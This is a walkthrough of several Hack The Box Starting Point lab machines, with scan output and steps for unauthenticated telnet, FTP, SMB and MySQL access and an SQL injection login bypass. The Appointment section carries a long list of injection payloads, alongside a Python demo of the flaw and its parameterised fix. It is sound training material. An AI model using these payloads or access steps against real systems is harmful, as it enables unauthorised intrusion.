
HTB: Starting Point machines in 2021.10

1. Connect to the VPN

Connect with openvpn; it needs sudo now, which seems a bit odd since it did not before.

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo openvpn starting_point_spwpun.ovpn 1 ⨯
[sudo] password for kali:
2021-10-28 15:16:41 WARNING: Compression for receiving enabled. Compression has been used in the past to break encryption. Sent packets are not compressed unless "allow-compression yes" is also set.
2021-10-28 15:16:41 DEPRECATED OPTION: --cipher set to 'AES-128-CBC' but missing in --data-ciphers (AES-256-GCM:AES-128-GCM). Future OpenVPN version will ignore --cipher for cipher negotiations. Add 'AES-128-CBC' to --data-ciphers or change --cipher 'AES-128-CBC' to --data-ciphers-fallback 'AES-128-CBC' to silence this warning.
2021-10-28 15:16:41 OpenVPN 2.5.0 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Oct 28 2020
2021-10-28 15:16:41 library versions: OpenSSL 1.1.1i 8 Dec 2020, LZO 2.10
2021-10-28 15:16:41 Outgoing Control Channel Encryption: Cipher 'AES-256-CTR' initialized with 256 bit key
2021-10-28 15:16:41 Outgoing Control Channel Encryption: Using 256 bit message hash 'SHA256' for HMAC authentication
2021-10-28 15:16:41 Incoming Control Channel Encryption: Cipher 'AES-256-CTR' initialized with 256 bit key
2021-10-28 15:16:41 Incoming Control Channel Encryption: Using 256 bit message hash 'SHA256' for HMAC authentication
2021-10-28 15:16:42 TCP/UDP: Preserving recently used remote address: [AF_INET]5.44.235.181:443
2021-10-28 15:16:42 Socket Buffers: R=[131072->131072] S=[16384->16384]
2021-10-28 15:16:42 Attempting to establish TCP connection with [AF_INET]5.44.235.181:443 [nonblock]
2021-10-28 15:16:42 TCP connection established with [AF_INET]5.44.235.181:443
2021-10-28 15:16:42 TCP_CLIENT link local: (not bound)
2021-10-28 15:16:42 TCP_CLIENT link remote: [AF_INET]5.44.235.181:443
2021-10-28 15:16:42 TLS: Initial packet from [AF_INET]5.44.235.181:443, sid=13956ae1 9f9d3589
2021-10-28 15:16:43 VERIFY OK: depth=1, CN=HackTheBox

2. Process

Got the target IP: 10.129.148.244


nmap:

──(kali㉿kali)-[~/Desktop]
└─$ nmap -sC -sV 10.129.148.244
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-28 15:26 EDT
Nmap scan report for bogon (10.129.148.244)
Host is up (0.80s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
23/tcp open telnet Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.40 seconds

telnet test:

──(kali㉿kali)-[~/Desktop]
└─$ telnet 10.129.148.244 1 ⨯
Trying 10.129.148.244...
Connected to 10.129.148.244.
Escape character is '^]'.

█ █ ▐▌ ▄█▄ █ ▄▄▄▄
█▄▄█ ▀▀█ █▀▀ ▐▌▄▀ █ █▀█ █▀█ █▌▄█ ▄▀▀▄ ▀▄▀
█ █ █▄█ █▄▄ ▐█▀▄ █ █ █ █▄▄ █▌▄█ ▀▄▄▀ █▀█


Meow login: admin
Password:

Login incorrect
Meow login: meow
Password:

Login incorrect
Meow login: root
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Thu 28 Oct 2021 07:42:54 PM UTC

System load: 0.08 Processes: 135
Usage of /: 41.7% of 7.75GB Users logged in: 0
Memory usage: 4% IPv4 address for eth0: 10.129.148.244
Swap usage: 0%

* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.

https://ubuntu.com/blog/microk8s-memory-optimisation

75 updates can be applied immediately.
31 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Sep 6 15:15:23 UTC 2021 from 10.10.14.18 on pts/0
root@Meow:~# whoami
root
root@Meow:~# ls
flag.txt snap
root@Meow:~# cat flag.txt
b40abdfe23665f766f9c61ecba8a4c19
root@Meow:~#

3. Success


Fawn

10.129.150.22:

──(kali㉿kali)-[~]
└─$ nmap -sC -sV 10.129.150.22
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-28 22:54 EDT
Nmap scan report for 10.129.150.22
Host is up (1.1s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 32 Jun 04 03:25 flag.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.16.69
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
54045/tcp filtered unknown
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 160.55 seconds

┌──(kali㉿kali)-[~]

Connected to FTP as the anonymous user to get flag.txt:

┌──(kali㉿kali)-[~]
└─$ ftp 10.129.150.22 1 ⨯ 1 ⚙
Connected to 10.129.150.22.
220 (vsFTPd 3.0.3)
Name (10.129.150.22:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cat flag.txt
?Invalid command
ftp> get flag.txt
local: flag.txt remote: flag.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for flag.txt (32 bytes).
226 Transfer complete.
32 bytes received in 0.00 secs (214.0411 kB/s)
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 32 Jun 04 03:25 flag.txt
226 Directory send OK.
ftp> bye
221 Goodbye.

┌──(kali㉿kali)-[~]
└─$ cat flag.txt 1 ⚙
035db21c881520061c53e0536e44f815
┌──(kali㉿kali)-[~]
└─$

Dancing

10.129.150.33:

─$ nmap -sC -sV 10.129.150.33                                                                            127 ⨯ 1 ⚙
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-29 01:24 EDT
Nmap scan report for 10.129.150.33
Host is up (0.97s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
481/tcp filtered dvs
3995/tcp filtered iss-mgmt-ssl
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 4h09m54s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-10-29T09:38:17
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 249.09 seconds
└─$ smbclient -L 10.129.150.33                                                                              1 ⨯ 1 ⚙
Enter WORKGROUP\kali's password:

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
WorkShares Disk
SMB1 disabled -- no workgroup available

──(kali㉿kali)-[~]
└─$ smbclient \\\\10.129.150.33\\WorkShares 1 ⚙
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> cd Amy.J
smb: \Amy.J\> ls
. D 0 Mon Mar 29 05:08:24 2021
.. D 0 Mon Mar 29 05:08:24 2021
worknotes.txt A 94 Fri Mar 26 07:00:37 2021
mo
5114111 blocks of size 4096. 1753764 blocks available
smb: \Amy.J\> more worknotes.txt
getting file \Amy.J\worknotes.txt of size 94 as /tmp/smbmore.Vl8cXX (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \Amy.J\> cd ../James.P
smb: \James.P\> ls
. D 0 Thu Jun 3 04:38:03 2021
.. D 0 Thu Jun 3 04:38:03 2021
flag.txt A 32 Mon Mar 29 05:26:57 2021
more flag
5114111 blocks of size 4096. 1753764 blocks available
smb: \James.P\> more flag.txt
getting file \James.P\flag.txt of size 32 as /tmp/smbmore.iI2ox0 (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \James.P\> get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \James.P\> quit

┌──(kali㉿kali)-[~]
└─$ cat flag.txt 1 ⚙
5f61c10dffbc77a704d76016a22f1664

Appointment

SQL injection basics, 10.129.150.95

nmap scan: port 80 is open, running httpd, and it serves a login page.

Directory brute-forcing with dirb found nothing.

Test a basic SQL injection:

username: admin' #
passwd: none

got flag!

e3d0796d002a446c0e622226f42e9672

SQL injection basics:

1' OR '1'='1

' or 1='1
'or'='or'
admin
admin'--
admin' or 4=4--
admin' or '1'='1'--
admin888
"or "a"="a
admin' or 2=2#
a' having 1=1#
a' having 1=1--
admin' or '2'='2
')or('a'='a
or 4=4--
c
a'or' 4=4--
"or 4=4--
'or'a'='a
"or"="a'='a
'or''='
'or'='or'
1 or '1'='1'=1
1 or '1'='1' or 4=4
'OR 4=4%00
"or 4=4%00
'xor
admin' UNION Select 1,1,1 FROM admin Where ''='
1
-1%cf' union select 1,1,1 as password,1,1,1 %23
1
admin' or 'a'='a (any password)
'or'='or'
'or 4=4/*
something
' OR '1'='1
1'or'1'='1
admin' OR 4=4/*
1'or'1'='1
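An added illustration, not part of the original write-up, of why the `admin' #` login above works and how to close it: the same login check written by string concatenation and with bound parameters, run against a constructed in-memory SQLite table. SQLite only recognises `--` as a line comment (MySQL also accepts `#`, which is why the page's payload used it), so the `admin'--` variant from the list is used here; the table contents and function names are assumptions.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: a single account, stored in memory."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    # A real system stores a password hash; plaintext keeps the demo short.
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    conn.commit()
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The injectable form: user input is glued straight into the SQL text.

    With username "admin'--" the query becomes
      ... WHERE username = 'admin'--' AND password = '...'
    and everything after -- is a comment, so the password check disappears.
    With password "' OR '1'='1" the WHERE clause becomes
      (username = 'admin' AND password = '') OR '1'='1'
    which is always true.
    """
    query = (
        "SELECT COUNT(*) FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(query).fetchone()[0] > 0


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The fix: bound parameters. The driver sends the input as data,
    so quotes and comment markers inside it are compared literally,
    never parsed as SQL."""
    query = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()[0] > 0


def compare(conn: sqlite3.Connection) -> dict:
    """Run the two payloads from the list above through both checks."""
    cases = {
        "comment bypass": ("admin'--", "anything"),
        "tautology bypass": ("admin", "' OR '1'='1"),
        "real credentials": ("admin", "correct-horse"),
    }
    return {
        name: {"vulnerable": vulnerable_login(conn, u, p), "safe": safe_login(conn, u, p)}
        for name, (u, p) in cases.items()
    }


if __name__ == "__main__":
    for name, result in compare(make_db()).items():
        print(f"{name:18s} vulnerable={result['vulnerable']}  safe={result['safe']}")
```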

Install gobuster:

sudo apt install golang-go -y

sudo apt install gccgo-go -y

go install github.com/OJ/gobuster/v3@latest

Sequel

rustscan:

└─$ rustscan --help                                                                                             1 ⚙
rustscan 2.0.0
Fast Port Scanner built in Rust. WARNING Do not use this program against sensitive infrastructure since the specified
server may not be able to handle this many socket connections at once. - Discord https://discord.gg/GFrQsGy - GitHub
https://github.com/RustScan/RustScan

USAGE:
rustscan [FLAGS] [OPTIONS] [-- <command>...]

FLAGS:
--accessible Accessible mode. Turns off features which negatively affect screen readers
-g, --greppable Greppable mode. Only output the ports. No Nmap. Useful for grep or outputting to a file
-h, --help Prints help information
-n, --no-config Whether to ignore the configuration file or not
--top Use the top 1000 ports
-V, --version Prints version information

OPTIONS:
-a, --addresses <addresses>... A list of comma separated CIDRs, IPs, or hosts to be scanned
-b, --batch-size <batch-size> The batch size for port scanning, it increases or slows the speed of scanning.
Depends on the open file limit of your OS. If you do 65535 it will do every port
at the same time. Although, your OS may not support this [default: 4500]
-p, --ports <ports>... A list of comma separed ports to be scanned. Example: 80,443,8080
-r, --range <range> A range of ports with format start-end. Example: 1-1000
--scan-order <scan-order> The order of scanning to be performed. The "serial" option will scan ports in
ascending order while the "random" option will scan ports randomly [default:
serial] [possible values: Serial, Random]
--scripts <scripts> Level of scripting required for the run [default: default] [possible values:
None, Default, Custom]
-t, --timeout <timeout> The timeout in milliseconds before a port is assumed to be closed [default: 1500]
--tries <tries> The number of tries before a port is assumed to be closed. If set to 0, rustscan
will correct it to 1 [default: 1]
-u, --ulimit <ulimit> Automatically ups the ULIMIT with the value you provided

ARGS:
<command>... The Script arguments to run. To use the argument -A, end RustScan's args with '-- -A'. Example:
'rustscan -T 1500 127.0.0.1 -- -A -sC'. This command adds -Pn -vvv -p $PORTS automatically to
nmap. For things like --script '(safe and vuln)' enclose it in quotations marks \"'(safe and
vuln)'\"")

scan result:

┌──(kali㉿kali)-[~]
└─$ rustscan --top -a 10.129.150.160 -b 1000 -t 5000 -u 5000 -- -A -sV 1 ⚙
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.150.160:3306
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-29 06:57 EDT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 06:57
Completed NSE at 06:57, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 06:57
Completed NSE at 06:57, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 06:57
Completed NSE at 06:57, 0.00s elapsed
Initiating Ping Scan at 06:57
Scanning 10.129.150.160 [2 ports]
Completed Ping Scan at 06:57, 0.97s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:57
Completed Parallel DNS resolution of 1 host. at 06:57, 1.03s elapsed
DNS resolution of 1 IPs took 1.03s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 06:57
Scanning 10.129.150.160 [1 port]
Discovered open port 3306/tcp on 10.129.150.160
Completed Connect Scan at 06:57, 0.24s elapsed (1 total ports)
Initiating Service scan at 06:57
Scanning 1 service on 10.129.150.160
Stats: 0:00:56 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Completed Service scan at 07:00, 173.98s elapsed (1 service on 1 host)
NSE: Script scanning 10.129.150.160.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 07:00
NSE Timing: About 99.30% done; ETC: 07:00 (0:00:00 remaining)
Completed NSE at 07:01, 44.50s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 07:01
NSE Timing: About 87.50% done; ETC: 07:01 (0:00:04 remaining)
Completed NSE at 07:01, 44.25s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 07:01
Completed NSE at 07:01, 0.00s elapsed
Nmap scan report for 10.129.150.160
Host is up, received conn-refused (0.88s latency).
Scanned at 2021-10-29 06:57:31 EDT for 265s

PORT STATE SERVICE REASON VERSION
3306/tcp open mysql? syn-ack
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
| Thread ID: 82
| Capabilities flags: 63486
| Some Capabilities: Support41Auth, Speaks41ProtocolOld, ODBCClient, ConnectWithDatabase, InteractiveClient, DontAllowDatabaseTableColumn, IgnoreSigpipes, SupportsLoadDataLocal, SupportsCompression, SupportsTransactions, Speaks41ProtocolNew, FoundRows, IgnoreSpaceBeforeParenthesis, LongColumnFlag, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: A)Ir%](M*)1XG;3,%p)y
|_ Auth Plugin Name: mysql_native_password
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 07:01
Completed NSE at 07:01, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 07:01
Completed NSE at 07:01, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 07:01
Completed NSE at 07:01, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 265.94 seconds


┌──(kali㉿kali)-[~]
└─$

mysql -h 10.129.150.160 -u root
mysql> show databases;
mysql> use htb;
mysql> show tables;
mysql> select * from config;

Then got the flag.

MySQL cheat sheet: https://www.mysqltutorial.org/mysql-cheat-sheet.aspx

Crocodile

10.129.151.56

rustscan: 21, 80

Then use nmap to scan those specific ports:

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV 10.129.151.56 -p 21,80 1 ⚙
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-29 08:18 EDT
Nmap scan report for 10.129.151.56
Host is up (0.37s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 33 Jun 08 10:58 allowed.userlist
|_-rw-r--r-- 1 ftp ftp 62 Apr 20 2021 allowed.userlist.passwd
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.16.69
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Smash - Bootstrap Business Template
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.60 seconds

Anonymous login to FTP: retrieved the user and password lists.

userlist:
aron
pwnmeow
egotisticalsw
admin
pwdlist:
root
Supersecretpassword1
@BaASD&9032123sADS
rKXM59ESxesUFHAd

Log in at http://10.129.151.56/login.php with admin/rKXM59ESxesUFHAd to get the flag:

c7110277ac44d78b6a9fff2232434d16